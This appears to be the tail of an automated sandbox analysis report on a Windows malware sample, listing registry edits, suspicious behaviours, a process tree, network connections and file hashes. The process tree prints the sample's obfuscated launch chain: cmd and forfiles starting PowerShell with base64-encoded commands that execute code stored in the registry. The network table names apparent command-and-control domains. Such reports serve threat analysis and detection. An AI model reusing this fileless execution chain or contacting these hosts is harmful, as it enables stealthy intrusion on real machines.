| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000ac16fa4d7d749c6f48b04e600045e586211c10e1eca22ca1b650425eecca04fc000000000e8000000002000020000000e33b3848fc714c4fb81104080bd3ee81c47c5a3f497a07237c4bb002fab3503ec0000000a5bf5b1bb138dfc8ce49df2e6c991c9e46e040c75336613ce72e89028f96324422b2f554a510a4348743f6d1bad51cf2b93640c7a97dc15546d04cc246701b97f1c65f5f6d9f01ac905ef077ac45a6df1d5d37544e0bfba5c4c0cc245866d56769b5f9c34ad61e9680dedaaa9b49ea6dea9bc9ef6e5950751907f56f955e47f6ca96ebc2fee851ce653cf4a265e2d0eec1c9c493e238fdd943f41547a330a973773f3012d039dbaa374bf03162ee6968e1179c6a85c81c867ed14a7ba6ba67f7400000007e57deb9f29453c88a9283b3e04d28b16caf07d880eba55796e51ff87d7eed0884d7b25591377c6942b589ef05ec2572fc0064af9f02415b4e5b9559ae9538d1 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000f072e04571f3a79c520911520eda0a6f2eac768d3496d11a29edaf9ea778c5f2000000000e8000000002000020000000cc84e32e32b8a586558e2a24efa5663ef8eddea3ca0a20961a89a533bc255b67c00000005b8197e1023d200f6ab6d4ee2de49c43ac550f5b7795c9f88a0965ce17599d42b51359fff60ba64f611537cafff3fc9e511c5ecd0d083f249b072a507c394659a778408f5425b48680f2b30eb098b0422761d69c0e8f7e4eb11ae213810868615986237ef3f2a432d876e6ca29fca03c53f6f24acf630edf8c1d3531c9d0de8282d5d5b9532158fe8218c560b7f189c220f308abc88b7b6ebc9b001d29ea241f4942223dfdea14d9ff90b97c864223d85566b40d99db10609a54c1a50f2a75954000000038ea2a2eb3ef1dad0ce43ebd65013c0205f4bf7460384b94ce80aa29081456dc2bccd49e320f211e40243e8d35f3735b8df4a83c9f507fed0739c48eae67781a | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff1a0000001a000000a00400007f020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1239828497" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b6000000000200000000001066000000010000200000008c42e6b8d457f5146390167162fcb60a41c4124eca3d36bdd84895ecbcb3cd12000000000e800000000200002000000013aedbf5bc9a85450522fe2a856a6dfaf17178ef821b4d0eeea8db5b5923550cc0000000ba925dd49375f5faa0a1a1ed43192204126520210c0db80429727f713fc85dc0adcce282aeed8428a6a99382b9b0cabb2ccc3cc3f1027c365b3c52237ac78bac0bc2feff9681075858f641e0fb2b9c99f6b83eaade5aca23947113c90cb6f01f108e344b76e65b43c849eba7742d402d3a178621bb6f5172d880f6d404faa0adfa754bb163315e3ccfc7b121844e16e2c5d479b96a114e4a649d20d94441f9a0549f76ec8cd4cc42d0c96c4ee4cf9eae2e76dc35a1ca30d7058c563c7c0673bd4000000073fb1a99705aa73a5d36293a947463e2f96caf2c89f43ec0cf1050c25f02653bf31ea82f2c9422f6738bb5de443de1b71887507408b7e32e0830edd14a460803 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b60000000002000000000010660000000100002000000097e9b3339d74b1b2a27394b9c04c68d9810549ea073ce400c1f26a70e483e573000000000e8000000002000020000000409ff2d119d14706fc8fc056cb00bfa9e02b1bdd8a1517571630130ea5bdfb0cc00000008b4dcc2d11885473e4f49787e893a372e9c7a4abf0e9c60613f666ce0aab891313301ba40607038fbba24b47e5422318c999ed6e71640f4c135eef439210882f49c0e410c69da73b824ce8081cd663d4eddcc1a0c0aa412bb0836b84a32928512e62433bf3a7bc398acdd570439456027212457de566fd1a437185dfd36076058884f88aca112a2c9796d31a06625045d478e22ecab29e7a7297d2d9011c210670361c61ad7db5fc7750f4ef655fac1c15cb064b7d71a9d3c98ff1cd2c149bcb4000000019ffb369db768ad67f79d3810f72a208f396cfd95cc76c895eca24eaf9da917edcfce43a8f03e4fb76479bb65dcf0dc16b06643c3ae51f1c030a7252e26c565d | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b60000000002000000000010660000000100002000000054d062f3fc9ff1baad305cb2483c891eea0c033264892af6f7b4adb7cabebb38000000000e80000000020000200000002c34af920b5c2c27426d6a5f91ecc3e8e20d4051c2198130ae646919cf191c4ac00000003d6f6e2f7af086329acbd80e0631058a102a1d732fa052523a1cc6b6a0ff0f561ee100620bcb99625692b02d7076630ec5ea8cbcef3ca75a0d3794ec3e5079903f275c76f74199131d67313f46b2f1b33e36c4707e96644a4a13132388b087c2afc505ce5d9e2f3e32378816a99b2915f274ed30544eb676a1c3496becd10aba5ad7c80358b89b2ec68a1a686a39330ef6febaeef4ecb94aa105e765d187e14b76e65fa6fcc8ff97a2be6106663db051ca55a9cb4f1b8084548b8169c2b92f1a40000000712a405b1189c567029dd21d216a4a304ce24d79c090e94b6ceb639bfc6da4e8f25763b45e74209fe1871997b754f88e1aa5978903a769a70682d1bd9bcc0236 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30947454" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe
"C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe"
C:\Program Files (x86)\Internet Explorer\ielowutil.exe
"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:17410 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82950 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82954 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82958 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82962 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:17412 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82968 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82972 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82976 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82980 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82984 /prefetch:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA= & exit" /p C:\Windows\system32 /s /m po*l.e*e
C:\Windows\system32\forfiles.exe
forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA= & exit" /p C:\Windows\system32 /s /m po*l.e*e
C:\Windows\system32\cmd.exe
/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA= & exit
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA=
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yduppq40\yduppq40.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD4FC.tmp" "c:\Users\Admin\AppData\Local\Temp\yduppq40\CSC1C2BCD08D0674F4EBB14B4F82C2728A0.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gkonnpn0\gkonnpn0.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD692.tmp" "c:\Users\Admin\AppData\Local\Temp\gkonnpn0\CSCFBE45FDC2F347C08385E222A1869041.TMP"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 444 -ip 444
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 444 -s 624
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | licensing.mp.microsoft.com | udp |
| US | 20.223.25.224:443 | licensing.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | storesdk.dsx.mp.microsoft.com | udp |
| NL | 104.80.225.205:443 | storesdk.dsx.mp.microsoft.com | tcp |
| US | 20.223.25.224:443 | licensing.mp.microsoft.com | tcp |
| US | 20.223.25.224:443 | licensing.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | gogojoob.xyz | udp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| US | 8.8.8.8:53 | licensing.mp.microsoft.com | udp |
| US | 20.223.25.224:443 | licensing.mp.microsoft.com | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| GB | 91.244.181.85:443 | tcp | |
| AT | 193.80.211.63:8080 | tcp | |
| NL | 45.137.184.31:80 | 45.137.184.31 | tcp |
| FR | 62.210.137.233:443 | 62.210.137.233 | tcp |
| RO | 89.34.27.237:9030 | 89.34.27.237 | tcp |
| FR | 62.210.137.233:443 | 62.210.137.233 | tcp |
| US | 199.249.230.117:80 | 199.249.230.117 | tcp |
| RO | 89.34.27.237:9030 | 89.34.27.237 | tcp |
| HK | 91.245.255.40:80 | 91.245.255.40 | tcp |
| DE | 45.14.233.149:80 | 45.14.233.149 | tcp |
| GB | 139.162.210.252:80 | 139.162.210.252 | tcp |
| US | 199.249.230.82:80 | 199.249.230.82 | tcp |
| DE | 45.14.233.149:80 | 45.14.233.149 | tcp |
| US | 199.249.230.117:80 | 199.249.230.117 | tcp |
| US | 199.249.230.82:80 | 199.249.230.82 | tcp |
| GB | 82.69.47.114:9030 | 82.69.47.114 | tcp |
| DE | 185.117.215.9:80 | 185.117.215.9 | tcp |
| US | 8.8.8.8:53 | unavas.xyz | udp |
| US | 8.8.8.8:53 | microsoft.com | udp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| US | 45.61.185.53:80 | 45.61.185.53 | tcp |
| RO | 89.34.27.237:9030 | 89.34.27.237 | tcp |
| SE | 83.226.182.52:8080 | 83.226.182.52 | tcp |
| US | 209.250.2.254:80 | 209.250.2.254 | tcp |
| HK | 91.245.255.40:80 | 91.245.255.40 | tcp |
| DE | 138.201.169.12:80 | 138.201.169.12 | tcp |
| PL | 82.118.21.102:80 | 82.118.21.102 | tcp |
| US | 199.249.230.66:80 | 199.249.230.66 | tcp |
| DE | 92.222.79.186:80 | 92.222.79.186 | tcp |
| CA | 199.58.81.140:80 | 199.58.81.140 | tcp |
| US | 199.249.230.82:80 | 199.249.230.82 | tcp |
| DE | 84.158.119.183:9030 | 84.158.119.183 | tcp |
| US | 199.249.230.74:80 | 199.249.230.74 | tcp |
| US | 199.249.230.176:80 | 199.249.230.176 | tcp |
| ID | 139.99.46.190:9030 | 139.99.46.190 | tcp |
| DE | 77.23.199.118:9030 | 77.23.199.118 | tcp |
| NL | 188.226.222.19:80 | 188.226.222.19 | tcp |
| DE | 90.186.84.208:8080 | 90.186.84.208 | tcp |
| TW | 118.163.74.160:80 | 118.163.74.160 | tcp |
| US | 199.249.230.82:80 | 199.249.230.82 | tcp |
| ZA | 160.119.249.240:80 | 160.119.249.240 | tcp |
| US | 199.249.230.173:80 | 199.249.230.173 | tcp |
| AT | 86.59.21.38:80 | 86.59.21.38 | tcp |
| JP | 182.169.28.173:80 | 182.169.28.173 | tcp |
| UA | 95.67.38.55:9030 | 95.67.38.55 | tcp |
| US | 185.220.103.112:80 | 185.220.103.112 | tcp |
| US | 8.8.8.8:53 | curlmyip.net | udp |
| FI | 135.181.84.242:80 | curlmyip.net | tcp |
| AT | 37.252.185.87:80 | 37.252.185.87 | tcp |
| CR | 200.122.181.78:80 | 200.122.181.78 | tcp |
| US | 199.249.230.176:80 | 199.249.230.176 | tcp |
| DE | 45.14.233.159:80 | 45.14.233.159 | tcp |
| US | 38.147.122.254:80 | 38.147.122.254 | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| US | 38.147.122.252:80 | 38.147.122.252 | tcp |
| US | 99.149.215.67:80 | 99.149.215.67 | tcp |
| CR | 200.122.181.101:80 | 200.122.181.101 | tcp |
| CL | 170.239.86.145:80 | 170.239.86.145 | tcp |
| DE | 178.254.35.99:80 | 178.254.35.99 | tcp |
| FR | 62.210.205.228:80 | 62.210.205.228 | tcp |
| US | 199.249.230.176:80 | 199.249.230.176 | tcp |
| US | 154.35.175.225:80 | 154.35.175.225 | tcp |
| US | 199.249.230.142:80 | 199.249.230.142 | tcp |
| NL | 5.2.72.226:80 | 5.2.72.226 | tcp |
| MY | 124.217.246.98:80 | 124.217.246.98 | tcp |
| VN | 125.212.217.197:80 | 125.212.217.197 | tcp |
| DE | 178.254.35.99:80 | 178.254.35.99 | tcp |
| US | 199.249.230.82:80 | 199.249.230.82 | tcp |
| US | 199.249.230.66:80 | 199.249.230.66 | tcp |
| PL | 192.166.245.158:80 | 192.166.245.158 | tcp |
| US | 199.249.230.73:80 | 199.249.230.73 | tcp |
| DE | 185.216.179.206:80 | 185.216.179.206 | tcp |
| US | 199.249.230.150:80 | 199.249.230.150 | tcp |
| US | 199.249.230.70:80 | 199.249.230.70 | tcp |
| BE | 45.128.133.206:80 | 45.128.133.206 | tcp |
| SE | 193.189.100.203:80 | 193.189.100.203 | tcp |
| FR | 163.172.94.144:9030 | 163.172.94.144 | tcp |
| LU | 104.244.73.126:80 | 104.244.73.126 | tcp |
| US | 199.249.230.77:80 | 199.249.230.77 | tcp |
| FR | 5.39.73.41:80 | 5.39.73.41 | tcp |
| FR | 92.243.29.88:80 | 92.243.29.88 | tcp |
| SE | 153.92.126.234:80 | 153.92.126.234 | tcp |
| US | 199.249.230.143:80 | 199.249.230.143 | tcp |
| DE | 178.254.9.25:80 | 178.254.9.25 | tcp |
| PL | 51.83.129.245:80 | tcp | |
| US | 199.249.230.84:80 | 199.249.230.84 | tcp |
| SE | 193.189.100.203:80 | tcp | |
| NL | 5.2.72.226:80 | tcp |
Files
memory/444-134-0x00000000005CE000-0x00000000005DA000-memory.dmp
memory/444-135-0x00000000005CE000-0x00000000005DA000-memory.dmp
memory/444-136-0x0000000000590000-0x000000000059C000-memory.dmp
memory/444-137-0x0000000001000000-0x000000000106F000-memory.dmp
memory/444-138-0x00000000005A0000-0x00000000005B0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\2psodd8\imagestore.dat
| MD5 | b07c239f418299f3b983557b171e5523 |
| SHA1 | f13960edf84337c30db5ed9b48a0aaea2ffe1805 |
| SHA256 | bc0ac00d36dedbf66b153395c9f6830e9a558c5112d2c286119a507323ed7709 |
| SHA512 | a37aa264a0bbea2a76c7b255baf335451d7188cb4d4a0d45c1cb725ca19cb6dd49cce18cf654eb55b3e32e79d1b0db7ea75636640dddf93ceb522975c02af6e6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
| MD5 | 54e9306f95f32e50ccd58af19753d929 |
| SHA1 | eab9457321f34d4dcf7d4a0ac83edc9131bf7c57 |
| SHA256 | 45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72 |
| SHA512 | 8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
| MD5 | 6bc51132df2990f83cad1b18f7095383 |
| SHA1 | 2b684fadcf445317566482e19b2ce050be5d1a45 |
| SHA256 | d77fc617d7f398c54bd8d11afaeb07315ce12db06bc9ed5a7195fbb6d4c19c39 |
| SHA512 | d81f094ef9b22925679779af522015684c0953fb433ce6f77202760da22870aa163c33e7274e3284685b2f030de381e80197a9bf697cf966608d701dbe728431 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\558DW1ID\favicon[1].ico
| MD5 | a976d227e5d1dcf62f5f7e623211dd1b |
| SHA1 | a2a9dc1abdd3d888484678663928cb024c359ee6 |
| SHA256 | 66332859bd8e3441a019e073a318b62a47014ba244121301034b510dc7532271 |
| SHA512 | 6754d545f2ce095cfa1fa7ca9e3223f89e37726ee7e541ebcf3e209e18b2602f3be8677598cb30d697327a63de032c11dbf8ef7ad7889a79c488a21044c1cb3f |
memory/1276-148-0x00000244DF5E0000-0x00000244DF602000-memory.dmp
memory/4644-150-0x00007FFDF9760000-0x00007FFDFA221000-memory.dmp
memory/1276-151-0x00000244F8F20000-0x00000244F8F22000-memory.dmp
memory/1276-149-0x00007FFDF9760000-0x00007FFDFA221000-memory.dmp
memory/1276-152-0x00000244F8F23000-0x00000244F8F25000-memory.dmp
memory/1276-153-0x00000244F8F26000-0x00000244F8F28000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
